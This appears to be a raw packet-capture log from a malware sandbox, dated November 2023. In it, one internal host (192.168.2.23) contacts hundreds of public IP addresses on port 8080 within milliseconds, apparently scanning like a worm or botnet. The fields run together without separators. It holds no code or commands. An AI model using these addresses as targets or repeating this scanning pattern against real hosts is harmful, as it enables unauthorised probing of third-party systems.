                                                              Nov 13, 2023 22:18:00.690715075 CET139488080192.168.2.2395.218.36.206
                                                              Nov 13, 2023 22:18:00.690718889 CET139488080192.168.2.2395.11.183.100
                                                              Nov 13, 2023 22:18:00.690732002 CET139488080192.168.2.2394.235.137.202
                                                              Nov 13, 2023 22:18:00.690736055 CET139488080192.168.2.2385.98.166.241
                                                              Nov 13, 2023 22:18:00.690737963 CET139488080192.168.2.2395.188.80.73
                                                              Nov 13, 2023 22:18:00.690754890 CET139488080192.168.2.2362.167.20.76
                                                              Nov 13, 2023 22:18:00.690757036 CET139488080192.168.2.2385.61.190.215
                                                              Nov 13, 2023 22:18:00.690758944 CET139488080192.168.2.2394.87.161.158
                                                              Nov 13, 2023 22:18:00.690759897 CET139488080192.168.2.2395.3.182.68
                                                              Nov 13, 2023 22:18:00.690759897 CET139488080192.168.2.2362.63.250.42
                                                              Nov 13, 2023 22:18:00.690759897 CET139488080192.168.2.2395.88.96.16
                                                              Nov 13, 2023 22:18:00.690767050 CET139488080192.168.2.2394.23.207.95
                                                              Nov 13, 2023 22:18:00.690767050 CET139488080192.168.2.2331.210.21.39
                                                              Nov 13, 2023 22:18:00.690773010 CET139488080192.168.2.2385.66.207.32
                                                              Nov 13, 2023 22:18:00.690782070 CET139488080192.168.2.2394.187.95.15
                                                              Nov 13, 2023 22:18:00.690784931 CET139488080192.168.2.2331.196.87.83
                                                              Nov 13, 2023 22:18:00.690784931 CET139488080192.168.2.2362.79.95.12
                                                              Nov 13, 2023 22:18:00.690829992 CET139488080192.168.2.2394.34.230.63
                                                              Nov 13, 2023 22:18:00.690844059 CET139488080192.168.2.2394.87.186.169
                                                              Nov 13, 2023 22:18:00.690844059 CET139488080192.168.2.2394.149.207.105
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2395.192.110.150
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2331.197.252.241
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2395.23.132.147
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2395.176.189.182
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2362.143.65.57
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2385.249.197.37
                                                              Nov 13, 2023 22:18:00.690845013 CET139488080192.168.2.2394.37.243.237
                                                              Nov 13, 2023 22:18:00.690846920 CET139488080192.168.2.2362.143.248.158
                                                              Nov 13, 2023 22:18:00.690846920 CET139488080192.168.2.2385.149.234.81
                                                              Nov 13, 2023 22:18:00.690848112 CET139488080192.168.2.2385.177.47.80
                                                              Nov 13, 2023 22:18:00.690848112 CET139488080192.168.2.2362.25.26.89
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2362.13.9.117
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2331.61.10.105
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2395.158.231.124
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2331.143.209.89
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2394.50.105.218
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2395.135.199.98
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:00.690869093 CET139488080192.168.2.2331.164.249.121
                                                              Nov 13, 2023 22:18:00.690867901 CET139488080192.168.2.2395.255.17.176
                                                              Nov 13, 2023 22:18:00.690870047 CET139488080192.168.2.2331.35.185.88
                                                              Nov 13, 2023 22:18:00.690866947 CET139488080192.168.2.2385.39.116.162
                                                              Nov 13, 2023 22:18:00.690869093 CET139488080192.168.2.2394.126.20.162
                                                              Nov 13, 2023 22:18:00.690870047 CET139488080192.168.2.2331.61.41.207
                                                              Nov 13, 2023 22:18:00.690869093 CET139488080192.168.2.2362.201.198.225
                                                              Nov 13, 2023 22:18:00.690874100 CET139488080192.168.2.2395.22.147.122
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2395.164.254.86
                                                              Nov 13, 2023 22:18:00.690869093 CET139488080192.168.2.2394.255.113.179
                                                              Nov 13, 2023 22:18:00.690870047 CET139488080192.168.2.2385.70.221.81
                                                              Nov 13, 2023 22:18:00.690869093 CET139488080192.168.2.2385.89.139.157
                                                              Nov 13, 2023 22:18:00.690870047 CET139488080192.168.2.2395.163.64.35
                                                              Nov 13, 2023 22:18:00.690874100 CET139488080192.168.2.2362.210.118.157
                                                              Nov 13, 2023 22:18:00.690870047 CET139488080192.168.2.2362.237.40.143
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2395.84.152.164
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2394.146.161.108
                                                              Nov 13, 2023 22:18:00.690893888 CET139488080192.168.2.2331.134.102.127
                                                              Nov 13, 2023 22:18:00.690865993 CET139488080192.168.2.2362.164.120.226
                                                              Nov 13, 2023 22:18:00.690893888 CET139488080192.168.2.2394.118.228.147
                                                              Nov 13, 2023 22:18:00.690893888 CET139488080192.168.2.2394.72.110.224
                                                              Nov 13, 2023 22:18:00.690902948 CET139488080192.168.2.2362.97.182.3
                                                              Nov 13, 2023 22:18:00.690907955 CET139488080192.168.2.2362.74.81.185
                                                              Nov 13, 2023 22:18:00.690921068 CET139488080192.168.2.2395.158.84.235
                                                              Nov 13, 2023 22:18:00.690922976 CET139488080192.168.2.2362.121.28.60
                                                              Nov 13, 2023 22:18:00.690922976 CET139488080192.168.2.2395.58.55.45
                                                              Nov 13, 2023 22:18:00.690923929 CET139488080192.168.2.2331.184.240.35
                                                              Nov 13, 2023 22:18:00.690926075 CET139488080192.168.2.2395.212.231.97
                                                              Nov 13, 2023 22:18:00.690926075 CET139488080192.168.2.2395.109.159.108
                                                              Nov 13, 2023 22:18:00.690929890 CET139488080192.168.2.2394.32.160.103
                                                              Nov 13, 2023 22:18:00.690948963 CET139488080192.168.2.2362.188.252.52
                                                              Nov 13, 2023 22:18:00.690956116 CET139488080192.168.2.2394.247.229.78
                                                              Nov 13, 2023 22:18:00.690956116 CET139488080192.168.2.2362.17.136.111
                                                              Nov 13, 2023 22:18:00.690957069 CET139488080192.168.2.2331.102.105.176
                                                              Nov 13, 2023 22:18:00.690958977 CET139488080192.168.2.2385.223.131.102
                                                              Nov 13, 2023 22:18:00.690959930 CET139488080192.168.2.2362.148.96.72
                                                              Nov 13, 2023 22:18:00.690958977 CET139488080192.168.2.2394.236.99.136
                                                              Nov 13, 2023 22:18:00.690958977 CET139488080192.168.2.2331.130.222.166
                                                              Nov 13, 2023 22:18:00.690958977 CET139488080192.168.2.2362.12.59.48
                                                              Nov 13, 2023 22:18:00.690958977 CET139488080192.168.2.2394.32.205.85
                                                              Nov 13, 2023 22:18:00.690959930 CET139488080192.168.2.2331.179.182.115
                                                              Nov 13, 2023 22:18:00.690959930 CET139488080192.168.2.2395.70.182.15
                                                              Nov 13, 2023 22:18:00.690979958 CET139488080192.168.2.2385.31.227.74
                                                              Nov 13, 2023 22:18:00.690989971 CET139488080192.168.2.2331.18.110.127
                                                              Nov 13, 2023 22:18:00.690994024 CET139488080192.168.2.2331.134.209.247
                                                              Nov 13, 2023 22:18:00.691001892 CET139488080192.168.2.2395.187.90.230
                                                              Nov 13, 2023 22:18:00.691004992 CET139488080192.168.2.2395.198.157.156
                                                              Nov 13, 2023 22:18:00.691013098 CET139488080192.168.2.2331.147.141.135
                                                              Nov 13, 2023 22:18:00.691013098 CET139488080192.168.2.2395.251.29.60
                                                              Nov 13, 2023 22:18:00.691013098 CET139488080192.168.2.2331.248.238.161
                                                              Nov 13, 2023 22:18:00.691013098 CET139488080192.168.2.2395.218.220.5
                                                              Nov 13, 2023 22:18:00.691015959 CET139488080192.168.2.2395.26.166.240
                                                              Nov 13, 2023 22:18:00.691015959 CET139488080192.168.2.2331.138.157.228
                                                              Nov 13, 2023 22:18:00.691015959 CET139488080192.168.2.2385.252.6.92
                                                              Nov 13, 2023 22:18:00.691015959 CET139488080192.168.2.2362.151.38.211
                                                              Nov 13, 2023 22:18:00.691023111 CET139488080192.168.2.2362.120.187.25
                                                              Nov 13, 2023 22:18:00.691023111 CET139488080192.168.2.2385.7.204.214
                                                              Nov 13, 2023 22:18:00.691023111 CET139488080192.168.2.2385.233.2.242
                                                              Nov 13, 2023 22:18:00.691040993 CET139488080192.168.2.2385.52.68.102
                                                              Nov 13, 2023 22:18:00.691040993 CET139488080192.168.2.2394.9.59.239
                                                              Nov 13, 2023 22:18:00.691040993 CET139488080192.168.2.2331.1.220.150
                                                              Nov 13, 2023 22:18:00.691054106 CET139488080192.168.2.2394.186.100.38
                                                              Nov 13, 2023 22:18:00.691063881 CET139488080192.168.2.2331.68.76.129
                                                              Nov 13, 2023 22:18:00.691066027 CET139488080192.168.2.2385.57.177.189
                                                              Nov 13, 2023 22:18:00.691066027 CET139488080192.168.2.2331.64.109.250
                                                              Nov 13, 2023 22:18:00.691072941 CET139488080192.168.2.2385.5.26.67
                                                              Nov 13, 2023 22:18:00.691086054 CET139488080192.168.2.2394.41.10.33
                                                              Nov 13, 2023 22:18:00.691087008 CET139488080192.168.2.2385.35.73.161
                                                              Nov 13, 2023 22:18:00.691087008 CET139488080192.168.2.2362.187.145.177
                                                              Nov 13, 2023 22:18:00.691087008 CET139488080192.168.2.2394.213.241.182
                                                              Nov 13, 2023 22:18:00.691092968 CET139488080192.168.2.2362.172.177.94
                                                              Nov 13, 2023 22:18:00.691096067 CET139488080192.168.2.2394.226.215.233
                                                              Nov 13, 2023 22:18:00.691103935 CET139488080192.168.2.2362.174.70.90
                                                              Nov 13, 2023 22:18:00.691108942 CET139488080192.168.2.2385.237.228.121
                                                              Nov 13, 2023 22:18:00.691121101 CET139488080192.168.2.2385.252.130.151
                                                              Nov 13, 2023 22:18:00.691121101 CET139488080192.168.2.2394.32.140.85
                                                              Nov 13, 2023 22:18:00.691128969 CET139488080192.168.2.2331.249.80.52
                                                              Nov 13, 2023 22:18:00.691129923 CET139488080192.168.2.2331.114.75.235
                                                              Nov 13, 2023 22:18:00.691131115 CET139488080192.168.2.2362.235.250.240
                                                              Nov 13, 2023 22:18:00.691131115 CET139488080192.168.2.2331.79.0.236
                                                              Nov 13, 2023 22:18:00.691138029 CET139488080192.168.2.2394.207.200.185
                                                              Nov 13, 2023 22:18:00.691148043 CET139488080192.168.2.2362.230.126.152
                                                              Nov 13, 2023 22:18:00.691157103 CET139488080192.168.2.2362.217.33.214
                                                              Nov 13, 2023 22:18:00.691167116 CET139488080192.168.2.2394.3.179.120
                                                              Nov 13, 2023 22:18:00.691168070 CET139488080192.168.2.2331.214.150.125
                                                              Nov 13, 2023 22:18:00.691169024 CET139488080192.168.2.2395.203.134.117
                                                              Nov 13, 2023 22:18:00.691173077 CET139488080192.168.2.2362.246.156.228
                                                              Nov 13, 2023 22:18:00.691184998 CET139488080192.168.2.2394.241.167.130
                                                              Nov 13, 2023 22:18:00.691184998 CET139488080192.168.2.2394.174.5.12
                                                              Nov 13, 2023 22:18:00.691184998 CET139488080192.168.2.2395.0.109.64
                                                              Nov 13, 2023 22:18:00.691184998 CET139488080192.168.2.2331.1.102.225
                                                              Nov 13, 2023 22:18:00.691184998 CET139488080192.168.2.2394.190.189.104
                                                              Nov 13, 2023 22:18:00.691190958 CET139488080192.168.2.2395.171.26.49
                                                              Nov 13, 2023 22:18:00.691193104 CET139488080192.168.2.2362.121.116.0
                                                              Nov 13, 2023 22:18:00.691206932 CET139488080192.168.2.2385.133.185.51
                                                              Nov 13, 2023 22:18:00.691206932 CET139488080192.168.2.2362.209.9.111
                                                              Nov 13, 2023 22:18:00.691211939 CET139488080192.168.2.2362.107.4.49
                                                              Nov 13, 2023 22:18:00.691224098 CET139488080192.168.2.2331.196.235.199
                                                              Nov 13, 2023 22:18:00.691224098 CET139488080192.168.2.2331.167.66.204
                                                              Nov 13, 2023 22:18:00.691224098 CET139488080192.168.2.2395.142.147.138
                                                              Nov 13, 2023 22:18:00.691231966 CET139488080192.168.2.2362.111.25.152
                                                              Nov 13, 2023 22:18:00.691232920 CET139488080192.168.2.2385.58.81.238
                                                              Nov 13, 2023 22:18:00.691232920 CET139488080192.168.2.2362.26.91.31
                                                              Nov 13, 2023 22:18:00.691236973 CET139488080192.168.2.2385.229.132.232
                                                              Nov 13, 2023 22:18:00.691240072 CET139488080192.168.2.2385.252.233.103
                                                              Nov 13, 2023 22:18:00.691250086 CET139488080192.168.2.2362.175.141.233
                                                              Nov 13, 2023 22:18:00.691250086 CET139488080192.168.2.2362.44.10.73
                                                              Nov 13, 2023 22:18:00.691256046 CET139488080192.168.2.2362.139.85.182
                                                              Nov 13, 2023 22:18:00.691257954 CET139488080192.168.2.2394.75.29.136
                                                              Nov 13, 2023 22:18:00.691257954 CET139488080192.168.2.2362.123.92.62
                                                              Nov 13, 2023 22:18:00.691263914 CET139488080192.168.2.2331.237.69.176
                                                              Nov 13, 2023 22:18:00.691266060 CET139488080192.168.2.2331.65.243.183
                                                              Nov 13, 2023 22:18:00.691277027 CET139488080192.168.2.2331.85.101.239
                                                              Nov 13, 2023 22:18:00.691278934 CET139488080192.168.2.2394.17.244.252
                                                              Nov 13, 2023 22:18:00.691279888 CET139488080192.168.2.2394.102.165.177
                                                              Nov 13, 2023 22:18:00.691286087 CET139488080192.168.2.2395.47.234.4
                                                              Nov 13, 2023 22:18:00.691286087 CET139488080192.168.2.2394.155.29.188
                                                              Nov 13, 2023 22:18:00.691288948 CET139488080192.168.2.2362.39.207.182
                                                              Nov 13, 2023 22:18:00.691293955 CET139488080192.168.2.2394.204.67.30
                                                              Nov 13, 2023 22:18:00.691303015 CET139488080192.168.2.2395.55.121.12
                                                              Nov 13, 2023 22:18:00.691308975 CET139488080192.168.2.2362.41.71.55
                                                              Nov 13, 2023 22:18:00.691319942 CET139488080192.168.2.2362.197.190.216
                                                              Nov 13, 2023 22:18:00.691320896 CET139488080192.168.2.2331.100.139.231
                                                              Nov 13, 2023 22:18:00.691325903 CET139488080192.168.2.2395.186.28.189
                                                              Nov 13, 2023 22:18:00.691327095 CET139488080192.168.2.2394.181.42.60
                                                              Nov 13, 2023 22:18:00.691327095 CET139488080192.168.2.2385.145.139.48
                                                              Nov 13, 2023 22:18:00.691327095 CET139488080192.168.2.2385.185.183.186
                                                              Nov 13, 2023 22:18:00.691337109 CET139488080192.168.2.2331.32.136.32
                                                              Nov 13, 2023 22:18:00.691346884 CET139488080192.168.2.2395.190.55.191
                                                              Nov 13, 2023 22:18:00.691349983 CET139488080192.168.2.2395.181.221.41
                                                              Nov 13, 2023 22:18:00.691365004 CET139488080192.168.2.2362.181.79.245
                                                              Nov 13, 2023 22:18:00.691365957 CET139488080192.168.2.2394.6.5.197
                                                              Nov 13, 2023 22:18:00.691365957 CET139488080192.168.2.2331.72.154.140
                                                              Nov 13, 2023 22:18:00.691384077 CET139488080192.168.2.2331.216.169.60
                                                              Nov 13, 2023 22:18:00.691384077 CET139488080192.168.2.2394.125.224.217
                                                              Nov 13, 2023 22:18:00.691384077 CET139488080192.168.2.2394.43.63.63
                                                              Nov 13, 2023 22:18:00.691384077 CET139488080192.168.2.2331.32.101.215
                                                              Nov 13, 2023 22:18:00.691390038 CET139488080192.168.2.2385.143.113.98
                                                              Nov 13, 2023 22:18:00.691395044 CET139488080192.168.2.2395.4.38.95
                                                              Nov 13, 2023 22:18:00.691399097 CET139488080192.168.2.2394.142.12.236
                                                              Nov 13, 2023 22:18:00.691401958 CET139488080192.168.2.2395.107.25.15
                                                              Nov 13, 2023 22:18:00.691409111 CET139488080192.168.2.2362.128.154.250
                                                              Nov 13, 2023 22:18:00.691417933 CET139488080192.168.2.2385.200.36.206
                                                              Nov 13, 2023 22:18:00.691417933 CET139488080192.168.2.2395.12.153.211
                                                              Nov 13, 2023 22:18:00.691421986 CET139488080192.168.2.2385.92.88.139
                                                              Nov 13, 2023 22:18:00.691433907 CET139488080192.168.2.2394.129.35.120
                                                              Nov 13, 2023 22:18:00.691433907 CET139488080192.168.2.2394.187.190.75
                                                              Nov 13, 2023 22:18:00.691433907 CET139488080192.168.2.2395.33.157.168
                                                              Nov 13, 2023 22:18:00.691433907 CET139488080192.168.2.2362.190.10.99
                                                              Nov 13, 2023 22:18:00.691447020 CET139488080192.168.2.2394.218.146.139
                                                              Nov 13, 2023 22:18:00.691450119 CET139488080192.168.2.2362.132.63.204
                                                              Nov 13, 2023 22:18:00.691457987 CET139488080192.168.2.2385.218.210.144
                                                              Nov 13, 2023 22:18:00.691462040 CET139488080192.168.2.2385.70.189.119
                                                              Nov 13, 2023 22:18:00.691463947 CET139488080192.168.2.2331.133.200.140
                                                              Nov 13, 2023 22:18:00.691481113 CET139488080192.168.2.2394.203.235.162
                                                              Nov 13, 2023 22:18:00.691482067 CET139488080192.168.2.2394.57.240.241
                                                              Nov 13, 2023 22:18:00.691484928 CET139488080192.168.2.2395.208.34.141
                                                              Nov 13, 2023 22:18:00.691485882 CET139488080192.168.2.2385.206.227.72
                                                              Nov 13, 2023 22:18:00.691492081 CET139488080192.168.2.2331.63.123.78
                                                              Nov 13, 2023 22:18:00.691493034 CET139488080192.168.2.2362.121.198.101
                                                              Nov 13, 2023 22:18:00.691509008 CET139488080192.168.2.2385.152.105.240
                                                              Nov 13, 2023 22:18:00.691512108 CET139488080192.168.2.2331.181.200.126
                                                              Nov 13, 2023 22:18:00.691512108 CET139488080192.168.2.2385.48.217.70
                                                              Nov 13, 2023 22:18:00.691512108 CET139488080192.168.2.2395.11.49.153
                                                              Nov 13, 2023 22:18:00.691514015 CET139488080192.168.2.2395.129.39.215
                                                              Nov 13, 2023 22:18:00.691514015 CET139488080192.168.2.2395.147.40.37
                                                              Nov 13, 2023 22:18:00.691529989 CET139488080192.168.2.2394.35.233.114
                                                              Nov 13, 2023 22:18:00.691534996 CET139488080192.168.2.2395.136.165.251
                                                              Nov 13, 2023 22:18:00.691538095 CET139488080192.168.2.2331.14.124.31
                                                              Nov 13, 2023 22:18:00.691551924 CET139488080192.168.2.2394.74.14.214
                                                              Nov 13, 2023 22:18:00.691554070 CET139488080192.168.2.2362.162.163.108
                                                              Nov 13, 2023 22:18:00.691565037 CET139488080192.168.2.2331.1.193.8
                                                              Nov 13, 2023 22:18:00.691575050 CET139488080192.168.2.2362.57.63.50
                                                              Nov 13, 2023 22:18:00.691577911 CET139488080192.168.2.2362.28.102.184
                                                              Nov 13, 2023 22:18:00.691577911 CET139488080192.168.2.2395.126.206.214
                                                              Nov 13, 2023 22:18:00.691577911 CET139488080192.168.2.2331.113.213.239
                                                              Nov 13, 2023 22:18:00.691584110 CET139488080192.168.2.2331.63.69.48
                                                              Nov 13, 2023 22:18:00.691584110 CET139488080192.168.2.2331.166.224.175
                                                              Nov 13, 2023 22:18:00.691596031 CET139488080192.168.2.2385.82.251.167
                                                              Nov 13, 2023 22:18:00.691605091 CET139488080192.168.2.2362.154.129.157
                                                              Nov 13, 2023 22:18:00.691606045 CET139488080192.168.2.2394.63.86.244
                                                              Nov 13, 2023 22:18:00.691606045 CET139488080192.168.2.2385.16.224.208
                                                              Nov 13, 2023 22:18:00.691607952 CET139488080192.168.2.2385.182.205.124
                                                              Nov 13, 2023 22:18:00.691607952 CET139488080192.168.2.2394.162.70.183
                                                              Nov 13, 2023 22:18:00.691611052 CET139488080192.168.2.2385.78.115.15
                                                              Nov 13, 2023 22:18:00.691611052 CET139488080192.168.2.2385.14.189.78
                                                              Nov 13, 2023 22:18:00.691617966 CET139488080192.168.2.2362.239.226.8
                                                              Nov 13, 2023 22:18:00.691626072 CET139488080192.168.2.2331.10.32.85
                                                              Nov 13, 2023 22:18:00.691627026 CET139488080192.168.2.2385.151.136.112
                                                              Nov 13, 2023 22:18:00.691633940 CET139488080192.168.2.2394.108.14.106
                                                              Nov 13, 2023 22:18:00.691651106 CET139488080192.168.2.2362.106.43.111
                                                              Nov 13, 2023 22:18:00.691651106 CET139488080192.168.2.2362.90.131.208
                                                              Nov 13, 2023 22:18:00.691653013 CET139488080192.168.2.2394.55.120.4
                                                              Nov 13, 2023 22:18:00.691658020 CET139488080192.168.2.2362.51.63.44
                                                              Nov 13, 2023 22:18:00.691662073 CET139488080192.168.2.2394.5.61.48
                                                              Nov 13, 2023 22:18:00.691678047 CET139488080192.168.2.2394.19.50.116
                                                              Nov 13, 2023 22:18:00.691678047 CET139488080192.168.2.2362.12.149.20
                                                              Nov 13, 2023 22:18:00.691678047 CET139488080192.168.2.2385.141.230.167
                                                              Nov 13, 2023 22:18:00.691679955 CET139488080192.168.2.2394.141.39.6
                                                              Nov 13, 2023 22:18:00.691684961 CET139488080192.168.2.2331.69.86.135
                                                              Nov 13, 2023 22:18:00.691693068 CET139488080192.168.2.2395.199.148.186
                                                              Nov 13, 2023 22:18:00.691705942 CET139488080192.168.2.2331.242.66.211
                                                              Nov 13, 2023 22:18:00.691705942 CET139488080192.168.2.2394.209.93.67
                                                              Nov 13, 2023 22:18:00.691708088 CET139488080192.168.2.2385.237.184.60
                                                              Nov 13, 2023 22:18:00.691713095 CET139488080192.168.2.2394.137.92.69
                                                              Nov 13, 2023 22:18:00.691724062 CET139488080192.168.2.2331.106.43.38
                                                              Nov 13, 2023 22:18:00.691725969 CET139488080192.168.2.2362.6.226.197
                                                              Nov 13, 2023 22:18:00.691726923 CET139488080192.168.2.2331.18.185.162
                                                              Nov 13, 2023 22:18:00.691728115 CET139488080192.168.2.2394.102.131.214
                                                              Nov 13, 2023 22:18:00.691735029 CET139488080192.168.2.2385.253.81.60
                                                              Nov 13, 2023 22:18:00.691735983 CET139488080192.168.2.2394.113.143.107
                                                              Nov 13, 2023 22:18:00.691735983 CET139488080192.168.2.2395.135.80.64
                                                              Nov 13, 2023 22:18:00.691745996 CET139488080192.168.2.2331.192.10.35
                                                              Nov 13, 2023 22:18:00.691754103 CET139488080192.168.2.2395.104.124.192
                                                              Nov 13, 2023 22:18:00.691754103 CET139488080192.168.2.2395.240.24.144
                                                              Nov 13, 2023 22:18:00.691754103 CET139488080192.168.2.2362.64.123.25
                                                              Nov 13, 2023 22:18:00.691767931 CET139488080192.168.2.2385.245.201.203
                                                              Nov 13, 2023 22:18:00.691770077 CET139488080192.168.2.2331.197.95.62
                                                              Nov 13, 2023 22:18:00.691771984 CET139488080192.168.2.2362.247.119.62
                                                              Nov 13, 2023 22:18:00.691771984 CET139488080192.168.2.2395.105.58.5
                                                              Nov 13, 2023 22:18:00.691775084 CET139488080192.168.2.2385.14.106.140
                                                              Nov 13, 2023 22:18:00.691782951 CET139488080192.168.2.2362.242.135.38
                                                              Nov 13, 2023 22:18:00.691783905 CET139488080192.168.2.2331.126.189.10
                                                              Nov 13, 2023 22:18:00.691790104 CET139488080192.168.2.2395.219.179.223
                                                              Nov 13, 2023 22:18:00.691791058 CET139488080192.168.2.2385.223.241.254
                                                              Nov 13, 2023 22:18:00.691792011 CET139488080192.168.2.2331.30.195.192
                                                              Nov 13, 2023 22:18:00.691804886 CET139488080192.168.2.2395.122.83.167
                                                              Nov 13, 2023 22:18:00.691812992 CET139488080192.168.2.2394.166.55.21
                                                              Nov 13, 2023 22:18:00.691816092 CET139488080192.168.2.2385.153.168.75
                                                              Nov 13, 2023 22:18:00.691826105 CET139488080192.168.2.2394.215.174.171
                                                              Nov 13, 2023 22:18:00.691827059 CET139488080192.168.2.2331.14.167.202
                                                              Nov 13, 2023 22:18:00.691827059 CET139488080192.168.2.2331.210.135.30
                                                              Nov 13, 2023 22:18:00.691837072 CET139488080192.168.2.2394.171.146.227
                                                              Nov 13, 2023 22:18:00.691838980 CET139488080192.168.2.2331.136.151.120
                                                              Nov 13, 2023 22:18:00.691844940 CET139488080192.168.2.2362.110.119.176
                                                              Nov 13, 2023 22:18:00.691854000 CET139488080192.168.2.2394.194.104.54
                                                              Nov 13, 2023 22:18:00.691855907 CET139488080192.168.2.2362.22.194.141
                                                              Nov 13, 2023 22:18:00.691864967 CET139488080192.168.2.2395.67.170.92
                                                              Nov 13, 2023 22:18:00.691871881 CET139488080192.168.2.2362.122.195.158
                                                              Nov 13, 2023 22:18:00.691871881 CET139488080192.168.2.2331.75.115.36
                                                              Nov 13, 2023 22:18:00.691878080 CET139488080192.168.2.2394.106.147.78
                                                              Nov 13, 2023 22:18:00.691880941 CET139488080192.168.2.2395.88.28.189
                                                              Nov 13, 2023 22:18:00.691883087 CET139488080192.168.2.2395.16.174.185
                                                              Nov 13, 2023 22:18:00.691900969 CET139488080192.168.2.2394.254.189.191
                                                              Nov 13, 2023 22:18:00.691900969 CET139488080192.168.2.2362.200.190.239
                                                              Nov 13, 2023 22:18:00.691903114 CET139488080192.168.2.2385.180.21.37
                                                              Nov 13, 2023 22:18:00.691909075 CET139488080192.168.2.2385.31.152.235
                                                              Nov 13, 2023 22:18:00.691921949 CET139488080192.168.2.2395.41.80.160
                                                              Nov 13, 2023 22:18:00.691922903 CET139488080192.168.2.2331.188.211.167
                                                              Nov 13, 2023 22:18:00.691927910 CET139488080192.168.2.2331.115.102.242
                                                              Nov 13, 2023 22:18:00.691927910 CET139488080192.168.2.2331.71.175.246
                                                              Nov 13, 2023 22:18:00.691931009 CET139488080192.168.2.2331.66.171.94
                                                              Nov 13, 2023 22:18:00.691932917 CET139488080192.168.2.2331.103.42.97
                                                              Nov 13, 2023 22:18:00.691947937 CET139488080192.168.2.2362.45.55.167
                                                              Nov 13, 2023 22:18:00.691951036 CET139488080192.168.2.2395.67.105.67
                                                              Nov 13, 2023 22:18:00.691951036 CET139488080192.168.2.2331.14.159.105
                                                              Nov 13, 2023 22:18:00.691958904 CET139488080192.168.2.2331.229.5.15
                                                              Nov 13, 2023 22:18:00.691965103 CET139488080192.168.2.2362.111.82.218
                                                              Nov 13, 2023 22:18:00.691965103 CET139488080192.168.2.2362.77.154.177
                                                              Nov 13, 2023 22:18:00.691965103 CET139488080192.168.2.2394.75.250.253
                                                              Nov 13, 2023 22:18:00.691982031 CET139488080192.168.2.2385.38.15.232
                                                              Nov 13, 2023 22:18:00.691984892 CET139488080192.168.2.2395.251.175.236
                                                              Nov 13, 2023 22:18:00.691986084 CET139488080192.168.2.2331.215.119.86
                                                              Nov 13, 2023 22:18:00.691987991 CET139488080192.168.2.2395.50.222.1
                                                              Nov 13, 2023 22:18:00.692004919 CET139488080192.168.2.2395.69.66.145
                                                              Nov 13, 2023 22:18:00.692009926 CET139488080192.168.2.2394.218.74.65
                                                              Nov 13, 2023 22:18:00.692009926 CET139488080192.168.2.2394.133.66.147
                                                              Nov 13, 2023 22:18:00.692013979 CET139488080192.168.2.2385.108.111.159
                                                              Nov 13, 2023 22:18:00.692013979 CET139488080192.168.2.2395.246.49.139
                                                              Nov 13, 2023 22:18:00.692020893 CET139488080192.168.2.2385.1.186.146
                                                              Nov 13, 2023 22:18:00.692023039 CET139488080192.168.2.2385.171.202.164
                                                              Nov 13, 2023 22:18:00.692023993 CET139488080192.168.2.2331.78.79.131
                                                              Nov 13, 2023 22:18:00.692024946 CET139488080192.168.2.2362.0.106.72
                                                              Nov 13, 2023 22:18:00.692034006 CET139488080192.168.2.2395.31.53.205
                                                              Nov 13, 2023 22:18:00.692034006 CET139488080192.168.2.2385.150.184.73
                                                              Nov 13, 2023 22:18:00.692040920 CET139488080192.168.2.2394.70.235.84
                                                              Nov 13, 2023 22:18:00.692045927 CET139488080192.168.2.2395.130.164.210
                                                              Nov 13, 2023 22:18:00.692045927 CET139488080192.168.2.2394.102.109.119
                                                              Nov 13, 2023 22:18:00.692058086 CET80804494294.120.12.219192.168.2.23
                                                              Nov 13, 2023 22:18:00.692061901 CET139488080192.168.2.2331.85.30.141
                                                              Nov 13, 2023 22:18:00.692063093 CET139488080192.168.2.2394.32.98.5
                                                              Nov 13, 2023 22:18:00.692061901 CET139488080192.168.2.2362.110.121.158
                                                              Nov 13, 2023 22:18:00.692061901 CET139488080192.168.2.2385.193.245.23
                                                              Nov 13, 2023 22:18:00.692064047 CET139488080192.168.2.2362.240.232.129
                                                              Nov 13, 2023 22:18:00.692065001 CET139488080192.168.2.2362.229.169.36
                                                              Nov 13, 2023 22:18:00.692079067 CET139488080192.168.2.2385.146.75.1
                                                              Nov 13, 2023 22:18:00.692081928 CET139488080192.168.2.2394.186.250.165
                                                              Nov 13, 2023 22:18:00.692081928 CET139488080192.168.2.2394.56.143.63
                                                              Nov 13, 2023 22:18:00.692085981 CET139488080192.168.2.2362.159.55.233
                                                              Nov 13, 2023 22:18:00.692087889 CET139488080192.168.2.2394.162.85.59
                                                              Nov 13, 2023 22:18:00.692087889 CET139488080192.168.2.2362.50.63.66
                                                              Nov 13, 2023 22:18:00.692107916 CET139488080192.168.2.2331.96.126.111
                                                              Nov 13, 2023 22:18:00.692110062 CET139488080192.168.2.2331.217.172.40
                                                              Nov 13, 2023 22:18:00.692126036 CET139488080192.168.2.2331.43.125.171
                                                              Nov 13, 2023 22:18:00.692126036 CET139488080192.168.2.2362.137.28.178
                                                              Nov 13, 2023 22:18:00.692126036 CET449428080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:00.692131996 CET139488080192.168.2.2331.107.218.195
                                                              Nov 13, 2023 22:18:00.692137003 CET139488080192.168.2.2394.78.168.74
                                                              Nov 13, 2023 22:18:00.692148924 CET139488080192.168.2.2362.250.99.8
                                                              Nov 13, 2023 22:18:00.692152977 CET139488080192.168.2.2395.164.160.36
                                                              Nov 13, 2023 22:18:00.692154884 CET139488080192.168.2.2331.9.132.168
                                                              Nov 13, 2023 22:18:00.692154884 CET139488080192.168.2.2385.209.134.52
